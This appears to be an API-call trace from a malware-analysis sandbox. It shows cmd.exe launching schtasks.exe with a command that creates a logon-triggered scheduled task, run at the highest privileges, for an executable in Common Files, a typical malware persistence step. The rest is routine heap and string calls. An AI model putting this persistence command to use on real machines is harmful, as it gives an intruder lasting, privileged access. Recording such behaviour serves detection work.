0x5a0000 [0156.551] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5a07f0, Size=0x42) returned 0x5a07f0 [0156.551] GetProcessHeap () returned 0x5a0000 [0156.551] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5a07f0) returned 0x42 [0156.551] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a920640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0156.551] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0156.551] GetProcessHeap () returned 0x5a0000 [0156.551] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xfc) returned 0x5b3540 [0156.551] GetProcessHeap () returned 0x5a0000 [0156.551] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1f0) returned 0x5a0840 [0156.557] GetProcessHeap () returned 0x5a0000 [0156.557] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5a0840, Size=0xfe) returned 0x5a0840 [0156.557] GetProcessHeap () returned 0x5a0000 [0156.557] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5a0840) returned 0xfe [0156.557] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a920640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.557] GetProcessHeap () returned 0x5a0000 [0156.557] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xe0) returned 0x5a0948 [0156.557] GetProcessHeap () returned 0x5a0000 [0156.557] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5a0948, Size=0x76) returned 0x5a0948 [0156.557] GetProcessHeap () returned 0x5a0000 [0156.557] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5a0948) returned 0x76 [0156.625] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.625] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x2becf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2becf4) returned 0x5b3648 [0156.626] GetProcessHeap () returned 0x5a0000 [0156.627] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b1818 [0156.627] FindClose (in: hFindFile=0x5b3648 | out: hFindFile=0x5b3648) returned 1 [0156.627] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x2becf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2becf4) returned 0xffffffff [0156.627] GetLastError () returned 0x2 [0156.627] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x2becf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2becf4) returned 0x5b3648 [0156.627] GetProcessHeap () returned 0x5a0000 [0156.627] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5b1818, Size=0x4) returned 0x5b1818 [0156.627] FindClose (in: hFindFile=0x5b3648 | out: hFindFile=0x5b3648) returned 1 [0156.627] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0156.627] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0156.627] GetConsoleTitleW (in: lpConsoleTitle=0x2bf1ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.628] InitializeProcThreadAttributeList (in: lpAttributeList=0x2bf074, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2bf13c | out: lpAttributeList=0x2bf074, lpSize=0x2bf13c) returned 1 [0156.628] UpdateProcThreadAttribute (in: lpAttributeList=0x2bf074, dwFlags=0x0, Attribute=0x60001, lpValue=0x2bf134, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2bf074, lpPreviousValue=0x0) returned 1 [0156.628] GetStartupInfoW (in: lpStartupInfo=0x2bf030 | out: lpStartupInfo=0x2bf030*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0156.628] GetProcessHeap () returned 0x5a0000 [0156.628] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b1828 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0156.628] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0156.629] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0156.629] GetProcessHeap () returned 0x5a0000 [0156.629] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b1828 | out: hHeap=0x5a0000) returned 1 [0156.629] GetProcessHeap () returned 0x5a0000 [0156.629] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa) returned 0x5affd8 [0156.629] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0156.631] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2bf0d0*(cb=0x48, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2bf11c | out: lpCommandLine="schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x2bf11c*(hProcess=0x78, hThread=0x74, dwProcessId=0x5ec, dwThreadId=0x360)) returned 1 [0156.642] CloseHandle (hObject=0x74) returned 1 [0156.642] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0156.642] GetProcessHeap () returned 0x5a0000 [0156.642] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b5fc0 | out: hHeap=0x5a0000) returned 1 [0156.642] GetEnvironmentStringsW () returned 0x5b5fc0* [0156.642] GetProcessHeap () returned 0x5a0000 [0156.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb12) returned 0x5b41a0 [0156.643] FreeEnvironmentStringsW (penv=0x5b5fc0) returned 1 [0156.643] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) Process: id = "15" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x682e1000" os_pid = "0x5ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x318" cmd_line = "schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 139 os_tid = 0x360 [0157.101] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fd3c | out: lpSystemTimeAsFileTime=0x12fd3c*(dwLowDateTime=0x324acc0, dwHighDateTime=0x1d661be)) [0157.101] GetCurrentProcessId () returned 0x5ec [0157.101] GetCurrentThreadId () returned 0x360 [0157.101] GetTickCount () returned 0x1133a91 [0157.101] RtlQueryPerformanceCounter () returned 0x1 [0157.103] GetModuleHandleA (lpModuleName=0x0) returned 0x780000 [0157.103] __set_app_type (_Type=0x1) [0157.103] __p__fmode () returned 0x75d331f4 [0157.103] __p__commode () returned 0x75d331fc [0157.103] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x797881) returned 0x0 [0157.103] __wgetmainargs (in: _Argc=0x7a9e6c, _Argv=0x7a9e74, _Env=0x7a9e70, _DoWildCard=0, _StartInfo=0x7a9e80 | out: _Argc=0x7a9e6c, _Argv=0x7a9e74, _Env=0x7a9e70) returned 0 [0157.104] _onexit (_Func=0x7a0fe2) returned 0x7a0fe2 [0157.104] _onexit (_Func=0x7a0ff3) returned 0x7a0ff3 [0157.104] _onexit (_Func=0x7a1002) returned 0x7a1002 [0157.105] _onexit (_Func=0x7a101e) returned 0x7a101e [0157.105] _onexit (_Func=0x7a103a) returned 0x7a103a [0157.105] _onexit (_Func=0x7a1056) returned 0x7a1056 [0157.105] _onexit (_Func=0x7a1072) returned 0x7a1072 [0157.105] _onexit (_Func=0x7a108e) returned 0x7a108e [0157.105] _onexit (_Func=0x7a10aa) returned 0x7a10aa [0157.105] _onexit (_Func=0x7a10c6) returned 0x7a10c6 [0157.106] _onexit (_Func=0x7a10e2) returned 0x7a10e2 [0157.120] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0157.120] WinSqmIsOptedIn () returned 0x0 [0157.121] GetProcessHeap () returned 0x4b0000 [0157.121] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4bd8 [0157.121] SetLastError (dwErrCode=0x0) [0157.121] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0157.121] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0157.121] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0157.121] VerifyVersionInfoW (in: lpVersionInformation=0x12f7b4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x12f7b4) returned 1 [0157.121] GetProcessHeap () returned 0x4b0000 [0157.121] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4bf0 [0157.121] lstrlenW (lpString="") returned 0 [0157.121] GetProcessHeap () returned 0x4b0000 [0157.121] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x2) returned 0x4c4fc0 [0157.121] GetProcessHeap () returned 0x4b0000 [0157.121] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c4fd0 [0157.121] GetProcessHeap () returned 0x4b0000 [0157.121] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4c08 [0157.121] GetProcessHeap () returned 0x4b0000 [0157.121] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c4ff0 [0157.121] GetProcessHeap () returned 0x4b0000 [0157.121] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5010 [0157.121] GetProcessHeap () returned 0x4b0000 [0157.121] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5030 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5050 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4c20 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5070 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5090 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c50b0 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c50d0 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4c38 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c50f0 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5128 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5148 [0157.122] GetProcessHeap () returned 0x4b0000 [0157.122] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5168 [0157.122] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.123] SetLastError (dwErrCode=0x0) [0157.123] GetProcessHeap () returned 0x4b0000 [0157.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5188 [0157.123] GetProcessHeap () returned 0x4b0000 [0157.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c51a8 [0157.123] GetProcessHeap () returned 0x4b0000 [0157.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c51c8 [0157.123] GetProcessHeap () returned 0x4b0000 [0157.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c51e8 [0157.123] GetProcessHeap () returned 0x4b0000 [0157.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5208 [0157.123] GetProcessHeap () returned 0x4b0000 [0157.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4c50 [0157.123] _memicmp (_Buf1=0x4c4c50, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.123] GetProcessHeap () returned 0x4b0000 [0157.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x208) returned 0x4c5a90 [0157.123] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c5a90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0157.124] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x74d70000 [0157.126] GetProcAddress (hModule=0x74d70000, lpProcName="GetFileVersionInfoSizeW") returned 0x74d719d9 [0157.126] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0157.126] GetProcessHeap () returned 0x4b0000 [0157.126] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x74e) returned 0x4c5ca0 [0157.126] GetProcAddress (hModule=0x74d70000, lpProcName="GetFileVersionInfoW") returned 0x74d719f4 [0157.126] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x4c5ca0 | out: lpData=0x4c5ca0) returned 1 [0157.127] GetProcAddress (hModule=0x74d70000, lpProcName="VerQueryValueW") returned 0x74d71b51 [0157.127] VerQueryValueW (in: pBlock=0x4c5ca0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12f8bc, puLen=0x12f8c0 | out: lplpBuffer=0x12f8bc*=0x4c603c, puLen=0x12f8c0) returned 1 [0157.128] _memicmp (_Buf1=0x4c4c50, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.128] _vsnwprintf (in: _Buffer=0x4c5a90, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x12f8a4 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0157.128] VerQueryValueW (in: pBlock=0x4c5ca0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x12f8cc, puLen=0x12f8c8 | out: lplpBuffer=0x12f8cc*=0x4c5e68, puLen=0x12f8c8) returned 1 [0157.128] lstrlenW (lpString="schtasks.exe") returned 12 [0157.128] lstrlenW (lpString="schtasks.exe") returned 12 [0157.128] lstrlenW (lpString=".EXE") returned 4 [0157.128] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0157.129] lstrlenW (lpString="schtasks.exe") returned 12 [0157.129] lstrlenW (lpString=".EXE") returned 4 [0157.129] _memicmp (_Buf1=0x4c4c50, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.129] lstrlenW (lpString="schtasks") returned 8 [0157.129] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5248 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5268 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5288 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c52a8 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4cb0 [0157.130] _memicmp (_Buf1=0x4c4cb0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0xa0) returned 0x4c6680 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c52c8 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c52e8 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5308 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4cc8 [0157.130] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.130] GetProcessHeap () returned 0x4b0000 [0157.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x200) returned 0x4c6728 [0157.130] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0157.131] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0157.131] GetProcessHeap () returned 0x4b0000 [0157.131] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x30) returned 0x4c6930 [0157.131] _vsnwprintf (in: _Buffer=0x4c6680, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x12f8a8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0157.131] GetProcessHeap () returned 0x4b0000 [0157.131] GetProcessHeap () returned 0x4b0000 [0157.131] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5ca0) returned 1 [0157.131] GetProcessHeap () returned 0x4b0000 [0157.131] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c5ca0) returned 0x74e [0157.131] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c5ca0 | out: hHeap=0x4b0000) returned 1 [0157.131] SetLastError (dwErrCode=0x0) [0157.131] GetThreadLocale () returned 0x409 [0157.131] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.131] lstrlenW (lpString="?") returned 1 [0157.131] GetThreadLocale () returned 0x409 [0157.131] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.131] lstrlenW (lpString="create") returned 6 [0157.131] GetThreadLocale () returned 0x409 [0157.131] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.131] lstrlenW (lpString="delete") returned 6 [0157.131] GetThreadLocale () returned 0x409 [0157.131] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.132] lstrlenW (lpString="query") returned 5 [0157.132] GetThreadLocale () returned 0x409 [0157.132] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.132] lstrlenW (lpString="change") returned 6 [0157.132] GetThreadLocale () returned 0x409 [0157.132] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.132] lstrlenW (lpString="run") returned 3 [0157.132] GetThreadLocale () returned 0x409 [0157.132] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.132] lstrlenW (lpString="end") returned 3 [0157.132] GetThreadLocale () returned 0x409 [0157.132] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.132] lstrlenW (lpString="showsid") returned 7 [0157.132] GetThreadLocale () returned 0x409 [0157.132] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0157.132] SetLastError (dwErrCode=0x0) [0157.132] SetLastError (dwErrCode=0x0) [0157.132] lstrlenW (lpString="/create") returned 7 [0157.132] lstrlenW (lpString="-/") returned 2 [0157.132] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.132] lstrlenW (lpString="?") returned 1 [0157.132] lstrlenW (lpString="?") returned 1 [0157.132] GetProcessHeap () returned 0x4b0000 [0157.132] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4ce0 [0157.132] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.132] GetProcessHeap () returned 0x4b0000 [0157.132] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0xa) returned 0x4c4cf8 [0157.132] lstrlenW (lpString="create") returned 6 [0157.132] GetProcessHeap () returned 0x4b0000 [0157.132] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4d10 [0157.133] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.133] GetProcessHeap () returned 0x4b0000 [0157.133] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5328 [0157.133] _vsnwprintf (in: _Buffer=0x4c4cf8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|?|") returned 3 [0157.133] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f890 | out: _Buffer="|create|") returned 8 [0157.133] lstrlenW (lpString="|?|") returned 3 [0157.133] lstrlenW (lpString="|create|") returned 8 [0157.133] SetLastError (dwErrCode=0x490) [0157.133] lstrlenW (lpString="create") returned 6 [0157.133] lstrlenW (lpString="create") returned 6 [0157.133] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.133] GetProcessHeap () returned 0x4b0000 [0157.133] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4cf8) returned 1 [0157.133] GetProcessHeap () returned 0x4b0000 [0157.133] RtlReAllocateHeap (Heap=0x4b0000, Flags=0xc, Ptr=0x4c4cf8, Size=0x14) returned 0x4c5348 [0157.133] lstrlenW (lpString="create") returned 6 [0157.133] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 